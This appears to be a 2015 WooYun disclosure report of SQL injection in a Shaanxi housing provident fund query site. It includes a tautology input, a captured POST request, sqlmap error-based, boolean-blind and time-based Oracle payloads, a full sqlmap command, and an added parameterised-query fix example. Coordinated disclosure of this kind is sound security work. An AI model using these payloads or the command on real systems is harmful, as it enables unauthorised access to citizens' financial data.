SQL injection vulnerability in a municipal housing provident fund system in Shaanxi Province

Vulnerability summary

Defect ID: WooYun-2015-0129844

Title: SQL injection vulnerability in a municipal housing provident fund system in Shaanxi Province

Affected vendor: housing provident fund of a city in Shaanxi Province

Author: 毛毛虫

Submitted: 2015-07-30 19:27

Published: 2015-09-14 18:34

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Tags:

Vulnerability details

Disclosure status:

2015-07-30: Details sent to the vendor, awaiting vendor handling
2015-07-31: Vendor confirmed; details disclosed only to the vendor
2015-08-10: Details disclosed to core white hats and experts in related fields
2015-08-20: Details disclosed to regular white hats
2015-08-30: Details disclosed to intern white hats
2015-09-14: Details disclosed to the public

Brief description:

A site of the Xianyang (Shaanxi) housing provident fund has a SQL injection vulnerability that leaks a large amount of information about contributing users and contributing units. Only a few points are listed here; the number of affected users is too large, so testing was not continued.

Detailed description:

1. Entering 'or'1'='1 in the "Unit name" (单位名称) and "Unit account" (单位账号) fields on the unit account query page returns the contributing units' balances and other information.

2. Injection points (captured request and sqlmap output):

    POST /chaxun.asp HTTP/1.1
    Host: **.**.**.**
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:39.0) Gecko/20100101 Firefox/39.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://**.**.**.**/chaxun_danwei.asp
    Cookie: ASPSESSIONIDASSASSRB=KNBCMCKCEKKMCLKBOLIHPFOJ; IsFirst=True
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 70

    DepartmentName=123&DepartmentNum=123&GetType=1&button=++%B2%E9%D1%AF++

    Parameter: DepartmentNum (POST)
        Type: error-based
        Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
        Payload: DepartmentName=123&DepartmentNum=456' AND 4661=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (4661=4661) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'Umhb'='Umhb&GetType=1&button= %B2%E9%D1%AF
        Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

        Type: AND/OR time-based blind
        Title: Oracle AND time-based blind (heavy query)
        Payload: DepartmentName=123&DepartmentNum=456' AND 7534=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'XUYO'='XUYO&GetType=1&button= %B2%E9%D1%AF
        Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)

    Parameter: DepartmentName (POST)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause
        Payload: DepartmentName=-2642' OR 4414=4414 AND 'qTYp'='qTYp&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AF
        Vector: OR [INFERENCE]

        Type: error-based
        Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
        Payload: DepartmentName=123' AND 2629=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(118)||CHR(106)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (2629=2629) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(106)||CHR(120)||CHR(113)||CHR(62))) FROM DUAL) AND 'GfsH'='GfsH&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AF
        Vector: AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)

        Type: AND/OR time-based blind
        Title: Oracle AND time-based blind (heavy query)
        Payload: DepartmentName=123' AND 5424=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'uKuN'='uKuN&DepartmentNum=456&GetType=1&button= %B2%E9%D1%AF
        Vector: AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)

3. Command run:

    sqlmap.py -u "http://**.**.**.**/chaxun.asp" --data="DepartmentName=123&DepartmentNum=456&GetType=1&button=++%B2%E9%D1%AF++" --risk=3 -v 3 --dbs

Proof of vulnerability:

Fix:

Input filtering should be applied and the issue fixed as soon as possible.
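As an added illustration of the fix, not part of the original report: a constructed stand-in for the chaxun.asp lookup (sqlite instead of Oracle, Python instead of classic ASP, invented table and column names and sample rows) showing the concatenated query that the 'or'1'='1 input from the report turns into a tautology, beside a bound-parameter version with an allowlist check on the account number.

```python
import sqlite3

# Constructed stand-in for the table behind chaxun.asp; table and column
# names are assumptions for this example, not taken from the real system.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE units (DepartmentName TEXT, DepartmentNum TEXT, balance INTEGER)"
    )
    conn.executemany("INSERT INTO units VALUES (?, ?, ?)", [
        ("Unit A", "100001", 52000),   # sample rows, constructed
        ("Unit B", "100002", 87500),
        ("Unit C", "100003", 13000),
    ])
    return conn


def lookup_vulnerable(conn, name, num):
    """Query built by string concatenation: quotes in the input become part
    of the SQL, so 'or'1'='1 in either field turns the WHERE clause into a
    tautology and every unit's row comes back."""
    sql = ("SELECT DepartmentName, DepartmentNum, balance FROM units "
           f"WHERE DepartmentName = '{name}' AND DepartmentNum = '{num}'")
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, name, num):
    """Bound parameters keep the input as data, never SQL; an allowlist check
    on the account number (assumed here to be digits only) rejects malformed
    values before they reach the database at all."""
    if not num.isdigit():
        return []
    sql = ("SELECT DepartmentName, DepartmentNum, balance FROM units "
           "WHERE DepartmentName = ? AND DepartmentNum = ?")
    return conn.execute(sql, (name, num)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "'or'1'='1"                     # the input from the report
    print("vulnerable:", lookup_vulnerable(db, probe, probe))  # all three rows
    print("fixed:     ", lookup_fixed(db, probe, probe))       # []
```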

Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 11

Confirmation time: 2015-07-31 18:33

Vendor reply:

CNVD has confirmed the reported situation; the case has been forwarded via CNCERT to its Sichuan branch center, which will coordinate handling with the website's operating unit.

Latest status:

None yet

Comments